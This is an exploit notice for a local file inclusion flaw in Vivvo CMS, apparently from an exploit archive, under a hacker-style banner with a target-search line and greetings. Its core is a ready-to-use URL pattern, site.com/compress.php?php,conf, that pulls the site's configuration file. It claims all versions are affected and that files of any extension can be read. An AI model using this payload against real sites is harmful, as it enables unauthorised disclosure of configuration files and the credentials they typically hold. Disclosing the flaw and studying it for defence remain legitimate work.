Vivvo CMS - Local File Inclusion

EDB-ID:

17920

CVE:





Platform:

PHP

Date:

2011-10-02


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Exploit Title: Vivvo CMS - Local File include    !
D0rk: Find YourSelf =)                           !
Date: Sun, 02 Oct 2011 11:55:00 =)               !
Author: JaBrOtxHaCkEr                            !
E~mail My ^ v7_@hotmail.com ^                    !
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

#
Vulnerable SOftware:
#

********************************************************************
Vivvo CMS is an intuitive content management system atop a powerful programming
framework, empowering numerous industry leading online newspapers, magazines,
journals, TV and radio stations.
********************************************************************

********************************************************************
W3B : www.vivvo.net
Vr$i0n: v4.5 Or All
********************************************************************
Err0r In

File : compress.php?(css),file/namecss

Expl0it : site.com/compress.php?php,conf

# conf.php ~ (conf) (php) "site.com/compress.php?(php),(conf)"

File extension : TXT , PHP , css , rs , ..... all

site.com/compress.php?( ? ),filename


###############################################################
GrEetz To : HaCkEr KsA ~ ­iNjeCt ~ dEV!L-nEt ~ p0c.cc ~ Tryag.cc ~ v99x.com ~ All Friends My :$ <3